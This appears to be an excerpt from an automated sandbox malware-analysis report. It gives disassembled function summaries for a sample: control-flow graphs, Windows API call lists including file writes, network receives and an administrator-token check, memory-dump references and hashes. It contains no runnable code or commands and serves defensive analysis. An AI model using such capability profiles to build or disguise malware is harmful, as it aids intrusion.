161d25-161d3a 1421->1452 1453 161d5c-161d5e 1421->1453 1423 162023-162059 1422->1423 1424 161fff-162021 1422->1424 1426 162065-16206a 1423->1426 1427 16205b 1423->1427 1424->1426 1429 16206c-162077 call 14d670 1426->1429 1430 16207d-1620ae 1426->1430 1427->1426 1429->1391 1429->1430 1434 1620b4-1620c9 1430->1434 1435 162135-162181 recv 1430->1435 1439 1620cb-1620eb 1434->1439 1440 1620f9-162109 1434->1440 1435->1390 1436 162187 1435->1436 1436->1391 1442 16210f-16211b call 14d670 1439->1442 1443 1620ed-1620f7 1439->1443 1440->1442 1448 16211d-16212f 1442->1448 1449 162189-1621a8 1442->1449 1443->1442 1448->1435 1449->1391 1452->1453 1454 161d3c-161d5a 1452->1454 1455 161d64-161d6e 1453->1455 1456 161fa8-161fb7 1453->1456 1454->1453 1459 161d70-161d86 1455->1459 1460 161d88-161dcc 1455->1460 1457 161fcf 1456->1457 1458 161fb9-161fcd 1456->1458 1457->1422 1458->1422 1461 161ddc-161e18 1459->1461 1460->1461 1462 161dce-161dd5 1460->1462 1463 161e24-161e48 call 14c110 1461->1463 1464 161e1a 1461->1464 1462->1461 1467 161e54-161e56 1463->1467 1468 161e4a 1463->1468 1464->1463 1469 161f93-161fa2 1467->1469 1470 161e5c-161ec7 call 142f90 call 15a810 call 143410 call 16b940 1467->1470 1468->1467 1469->1456 1479 161efc-161f08 1470->1479 1480 161ec9-161edb 1470->1480 1481 161f0e-161f3f call 151bb0 1479->1481 1480->1481 1482 161edd-161efa 1480->1482 1485 161f45-161f69 1481->1485 1486 1621aa 1481->1486 1482->1481 1485->1469 1487 161f6b-161f8d 1485->1487 1486->1391 1487->1469
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XH$/
                                                                                                                                                                                                            • API String ID: 0-571299465
                                                                                                                                                                                                            • Opcode ID: 86313e4a76824fe82bdf1430199052fe167cbb740b3c353f206373189f083d22
                                                                                                                                                                                                            • Instruction ID: ef8cb2bfebd598330e323af41355f5a4dbc948586ff720e8fd952b287562e22a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 86313e4a76824fe82bdf1430199052fe167cbb740b3c353f206373189f083d22
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11F11371A00215DFD714EF60FC92ABA3BB9FB64300F54826AE40A579B1EB708AD4CF50
                                                                                                                                                                                                            Function 00151D90 Relevance: 4.7, APIs: 3, Instructions: 187fileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1665 151d90-151e21 call 175df0 call 163110 1670 151e23-151e4b call 16fcc0 1665->1670 1671 151e4c-151e91 CreateFileA 1665->1671 1672 151ed1-151ef0 1671->1672 1673 151e93-151ed0 call 16fcc0 1671->1673 1676 151ef2-151f06 1672->1676 1677 151f0c-151f18 1672->1677 1676->1677 1680 151f20-151f3e 1677->1680 1681 151f40-151f57 1680->1681 1682 151f59-151f85 1680->1682 1683 151f8b-152063 call 14b620 call 16ff30 WriteFile 1681->1683 1682->1683 1683->1680 1688 152069-15209c FindCloseChangeNotification call 16fcc0 1683->1688 1690 1520a1-1520b6 1688->1690 1691 1520c2-1520ca 1690->1691 1692 1520b8 1690->1692 1692->1691
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00163110: WaitForSingleObject.KERNEL32(00000708,00004E20,?,00150A18,00000128,00000000,00000000,?,0015126B,?,001625B4,?,00000708,00000000), ref: 001631AD
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,-0000004B,00000009), ref: 00151E7B
                                                                                                                                                                                                              • Part of subcall function 0016FCC0: ReleaseMutex.KERNEL32(00150D8E,?,00150D8E,00000128,00000000), ref: 0016FCE9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFileMutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1564016613-0
                                                                                                                                                                                                            • Opcode ID: 37c28564cba5a741b0206745fee1ea3b11a0d511c04560e6312677a5e70a4794
                                                                                                                                                                                                            • Instruction ID: 4c38f319b3cbb9f489e097b241f6d020158641a4adba2a40a042d69e04128246
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37c28564cba5a741b0206745fee1ea3b11a0d511c04560e6312677a5e70a4794
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D71F472611204DFC304DF64FC89A6A3BB9FB98315F418259E80697EB4DB709AE5CF81
                                                                                                                                                                                                            Function 0014B7A0 Relevance: 4.6, APIs: 3, Instructions: 89memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1693 14b7a0-14b84c AllocateAndInitializeSid 1694 14b861-14b864 1693->1694 1695 14b84e-14b85b 1693->1695 1696 14b8ee-14b90e 1694->1696 1697 14b86a-14b885 CheckTokenMembership 1694->1697 1695->1694 1698 14b8b4-14b8e8 FreeSid 1697->1698 1699 14b887-14b8ae 1697->1699 1698->1696 1699->1698
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0014B82B
                                                                                                                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 0014B87D
                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 0014B8D6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3429775523-0
                                                                                                                                                                                                            • Opcode ID: 1e434bf8c9f31915622607fa10d4e0e72f03e96b0633d08eb81183e79bc3b665
                                                                                                                                                                                                            • Instruction ID: 837e2b70412a640a764e1ba25bcebfe3eee488d6fa528ad107c108dc0005887f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e434bf8c9f31915622607fa10d4e0e72f03e96b0633d08eb81183e79bc3b665
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07319E75905248EFD704CFA8FDD99BA7BB8FB58304B01819AE40297AB0D7709AD4CB51
                                                                                                                                                                                                            Function 00152EB0 Relevance: 3.0, APIs: 2, Instructions: 40memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1700 152eb0-152ef9 GetProcessHeap RtlFreeHeap 1701 152f30-152f42 1700->1701 1702 152efb-152f07 1700->1702 1705 152f44-152f50 1701->1705 1706 152f56-152f57 1701->1706 1703 152f09-152f19 1702->1703 1704 152f1a-152f2f 1702->1704 1705->1706
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000002,?,00151BE7,0016979D,0016979D,00000000,-00000002,00000000,?,0016979D,00000002,00000000), ref: 00152ED1
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,00151BE7,0016979D,0016979D,00000000,-00000002,00000000,?,0016979D,00000002,00000000), ref: 00152ED8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3859560861-0
                                                                                                                                                                                                            • Opcode ID: 59c7adb539fa9924a3090a7480335d9ad5942488817bfa6c414050d21aedd6ee
                                                                                                                                                                                                            • Instruction ID: f30e63a88a2a06e5d576f11d18279de1a55d9d7526c50d3dd3a750582e1e580e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59c7adb539fa9924a3090a7480335d9ad5942488817bfa6c414050d21aedd6ee
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1301DF31608245CBC318DFA4FE668293BF9F7487207144206F51A8BEB0D330D8E98B15
                                                                                                                                                                                                            Function 0014A4E0 Relevance: 3.0, APIs: 2, Instructions: 33stringCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1707 14a4e0-14a53a lstrlen 1708 14a53c-14a548 1707->1708 1709 14a54e-14a564 CharLowerBuffA 1707->1709 1708->1709
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • lstrlen.KERNEL32(00152325,00000000,?,00152325,?), ref: 0014A4FE
                                                                                                                                                                                                            • CharLowerBuffA.USER32(00152325,00000000,?,00152325,?), ref: 0014A550
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: BuffCharLowerlstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 794975171-0
                                                                                                                                                                                                            • Opcode ID: cb5344382e32d7667f7ad6ad5330b9229be933540e370482a7f9664a0f35c812
                                                                                                                                                                                                            • Instruction ID: 1e7763b11c5200db3712b05806d599bd6850ffa4db8f98c1eab530ff360ec9b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb5344382e32d7667f7ad6ad5330b9229be933540e370482a7f9664a0f35c812
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF0CD71600220EFC3025F21FD4D5663BB8FF893613840512E48A86974E77489E2DFD2
                                                                                                                                                                                                            Function 0014E2C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 1710 14e2c0-14e2e2 1711 14e2e4-14e2ec 1710->1711 1712 14e2f2-14e306 GetProcessHeap RtlAllocateHeap 1710->1712 1711->1712
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,0017220A,02167FFC,?,?,?,?,0016463C), ref: 0014E2F8
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,0017220A,02167FFC,?,?,?,?,0016463C), ref: 0014E2FF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocateProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1357844191-0
                                                                                                                                                                                                            • Opcode ID: 8416483f14de977ede38d531b499846a59f5f9a06fabc187798644c3ca993560
                                                                                                                                                                                                            • Instruction ID: baadc4dfb9003755db613a08ab54eecf014547e236bae513d1af665befb331d9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8416483f14de977ede38d531b499846a59f5f9a06fabc187798644c3ca993560
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4E08C76104200AFC7089FA9FC8DA5633B8FB09305F144518FA0DC6AB2CB71E6C18B91
                                                                                                                                                                                                            Function 00150DC0 Relevance: 1.7, APIs: 1, Instructions: 182fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000708,80000000,00000000,00000000,00000003,00000000,00000000,?,?,00000708,00000000), ref: 00150F65
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                            • Opcode ID: f158f3300c98406f93f6878d735f0f9e18101cd3256fe716ff650a87f9cf76e2
                                                                                                                                                                                                            • Instruction ID: f8f99eb120a3361efe80290b3c46567df0733683f53e677aa19ebdb78b873c63
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f158f3300c98406f93f6878d735f0f9e18101cd3256fe716ff650a87f9cf76e2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80715372A00205DBD304DF68FC85B253BB5FB88311F65411AE81AC7EB4E7349AE5CB85
                                                                                                                                                                                                            Function 00163CF0 Relevance: 1.6, APIs: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00163E0B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                            • Opcode ID: 6067148dacfaaca10ff7886e7f0ae1bcb1f024ef822556e2d9005961edea5d71
                                                                                                                                                                                                            • Instruction ID: 5397fee7e2b920637bbddda1b32943dd6f83130f7f52fca8c039dd05e7acc12c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6067148dacfaaca10ff7886e7f0ae1bcb1f024ef822556e2d9005961edea5d71
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E412372A10314DBD314AF20FC82BA13BB1F7A4710F524219E651E6DB5FB709AE1CB91
                                                                                                                                                                                                            Function 001645A9 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_140000_idtpqzltyfy.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                            • Opcode ID: bfd0829247956772bdd8471333a8a263eff98c5e69947d433bafc4494db83330
                                                                                                                                                                                                            • Instruction ID: 79393dc8eedb8d78068f854f1d3d96820b88099698812382f07167b77e973e2e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfd0829247956772bdd8471333a8a263eff98c5e69947d433bafc4494db83330
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D61104755502068BC714AF74FE894253BF0FB55346325452AE04696DB5EB3086E1CB82
                                                                                                                                                                                                            Function 00151200 Relevance: 1.4, APIs: 1, Instructions: 165sleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • Sleep.KERNELBASE(000003E8,?,?,001625B4,?,00000708,00000000), ref: 0015139B
                                                                                                                                                                                                              • Part of subcall function 00150920: GetProcAddress.KERNEL32(76850000,00000000), ref: 00150A8A
                                                                                                                                                                                                              • Part of subcall function 00150920: GetProcAddress.KERNEL32(76850000,00000000), ref: 00150B05
                                                                                                                                                                                                              • Part of subcall function 00175370: CloseHandle.KERNEL32(?,00000000,?,001514A0,00000000,001CAF24,00000004,00000001,00000000,?,?,001625B4,?,00000708,00000000), ref: 00175398
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2068966797.0000000000141000.00000020.00000001.01000000.00000005.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2068937876.0000000000140000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069001869.0000000000177000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.000000000017C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001B9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069023405.00000000001CA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2069190910.00000000001CB000.00000002.00000001.01000000.00000005.sdmpDownload File
